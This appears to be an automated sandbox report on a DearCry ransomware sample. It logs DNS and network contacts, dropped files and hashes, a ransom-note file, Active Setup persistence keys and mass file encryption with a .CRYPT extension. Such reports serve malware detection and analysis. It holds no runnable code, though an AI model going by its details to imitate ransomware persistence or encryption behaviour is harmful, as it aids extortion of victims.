US	8.8.8.8:53	168.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	169.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	170.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	171.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	172.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	174.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	173.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	175.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	176.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	178.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	179.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	180.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	181.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	182.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	177.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	184.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	185.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	187.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	194.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	188.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	186.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	190.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	248.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	192.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	193.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	132.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	197.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	198.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	203.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	210.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	215.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	216.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	217.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	223.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	225.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	226.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	227.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	231.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	233.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	234.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	236.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	242.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	244.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	245.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	246.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	251.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	252.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	133.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	130.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	138.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	137.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	136.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	148.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	162.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	182.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	142.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	181.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	163.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	141.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	254.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	230.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	253.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	196.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	250.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	247.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	249.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	243.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	241.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	240.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	239.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	238.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	237.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	235.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	232.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	229.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	228.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	224.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	222.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	221.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	220.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	219.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	218.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	214.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	213.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	212.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	211.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	209.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	208.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	207.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	206.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	205.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	204.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	202.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	201.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	200.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	195.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	199.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	144.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	140.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	159.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	161.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	185.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	135.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	184.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	152.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	131.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	155.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	158.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	227.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	157.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	154.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	129.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	233.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	251.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	134.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	151.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	246.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	252.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	149.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	150.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	160.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	143.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	147.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	156.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	146.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	179.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	176.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	168.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	171.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	164.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	165.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	175.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	170.0.127.10.in-addr.arpa	udp
US	13.248.169.48:443	catsdegree.com	tcp
HK	154.219.131.251:443	temisleyes.com	tcp
US	8.8.8.8:53	209.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	201.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	208.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	211.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	213.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	199.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	25.140.123.92.in-addr.arpa	udp
US	8.8.8.8:53	88.156.103.20.in-addr.arpa	udp
US	8.8.8.8:53	23.236.111.52.in-addr.arpa	udp
US	8.8.8.8:53	tse1.mm.bing.net	udp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	8.8.8.8:53	10.27.171.150.in-addr.arpa	udp
US	8.8.8.8:53	26.35.223.20.in-addr.arpa	udp

Files

memory/4904-0-0x0000000000570000-0x0000000000587000-memory.dmp

memory/4904-8-0x0000000000570000-0x0000000000587000-memory.dmp

memory/1232-9-0x00007FF831443000-0x00007FF831445000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0dmrvuf2.2oh.ps1

MD5	d17fe0a3f47be24a6453e9ef58c94641
SHA1	6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256	96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512	5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1232-15-0x000001BFF7B40000-0x000001BFF7B62000-memory.dmp

memory/1232-20-0x00007FF831440000-0x00007FF831F01000-memory.dmp

memory/1232-21-0x00007FF831440000-0x00007FF831F01000-memory.dmp

memory/1232-22-0x00007FF831440000-0x00007FF831F01000-memory.dmp

memory/1232-25-0x00007FF831440000-0x00007FF831F01000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5	556084f2c6d459c116a69d6fedcc4105
SHA1	633e89b9a1e77942d822d14de6708430a3944dbc
SHA256	88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512	0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5	95e1c8db6eb5be60fa7c5f7ca36bfaed
SHA1	5b23544fe29ddd6f07852b4ff8971a5bf6c0fdf9
SHA256	3b3202f973ef9c0f477b91a022fd535a21e8b444279d8be34fcd16fccfe68a18
SHA512	de221bd9c8728434d7a463d7bc5123c5bc45362224b8e312abef60e2e89197cd9b77839df07069d663a483233d3395e9cd8b414d68c3b857eb9171d6d8a195db

C:\Users\Admin\README.72c99bf6.TXT

MD5	f418a249405444da33cc73b402a26306
SHA1	1a6c493e74036f93f0dae4b65e6c543c213ce418
SHA256	b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09
SHA512	b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf

memory/4904-97-0x0000000000570000-0x0000000000587000-memory.dmp

memory/4904-214-0x0000000000570000-0x0000000000587000-memory.dmp

memory/4904-215-0x0000000000570000-0x0000000000587000-memory.dmp

memory/4904-216-0x0000000000570000-0x0000000000587000-memory.dmp

memory/4904-218-0x0000000000570000-0x0000000000587000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win10v2004-20240709-en

Max time kernel

77s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

Signatures

DearCry

ransomware dearcry

Renames multiple (7374) files with added filename extension

ransomware

Boot or Logon Autostart Execution: Active Setup

persistence

Description	Indicator	Process	Target
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Software\Microsoft\Active Setup\Installed Components	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Software\Microsoft\Active Setup\Installed Components	C:\Windows\explorer.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Software\Microsoft\Active Setup\Installed Components	C:\Windows\explorer.exe	N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description	Indicator	Process	Target
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1750093773-264148664-1320403265-1000\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-1750093773-264148664-1320403265-1000\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Searches\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-1750093773-264148664-1320403265-1000\desktop.ini	C:\Windows\explorer.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	C:\Windows\explorer.exe	N/A
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Libraries\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A

Enumerates connected drives

Description	Indicator	Process	Target
File opened (read-only)	\??\D:	C:\Windows\explorer.exe	N/A
File opened (read-only)	\??\F:	C:\Windows\explorer.exe	N/A
File opened (read-only)	\??\D:	C:\Windows\explorer.exe	N/A
File opened (read-only)	\??\F:	C:\Windows\explorer.exe	N/A
File opened (read-only)	\??\D:	C:\Windows\explorer.exe	N/A
File opened (read-only)	\??\F:	C:\Windows\explorer.exe	N/A

Drops file in Program Files directory

Description	Indicator	Process	Target
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\bun.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\7-Zip\Lang\sr-spc.txt.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\micaut.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\bcel.md.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\proofing.msi.16.en-us.vreg.dat	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-57x57-precomposed.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hr-hr\ui-strings.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SplashScreen.scale-100.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg4.jpg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Java\jre-1.8\bin\policytool.exe.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN048.XML	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationFramework.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-72_contrast-white.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-white\MedTile.scale-200.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons_2x.png.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\music_welcome_page.jpg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ReachFramework.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File created	C:\Program Files\Google\Chrome\Application\123.0.6312.106\VisualElements\Logo.png.CRYPT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe	N/A
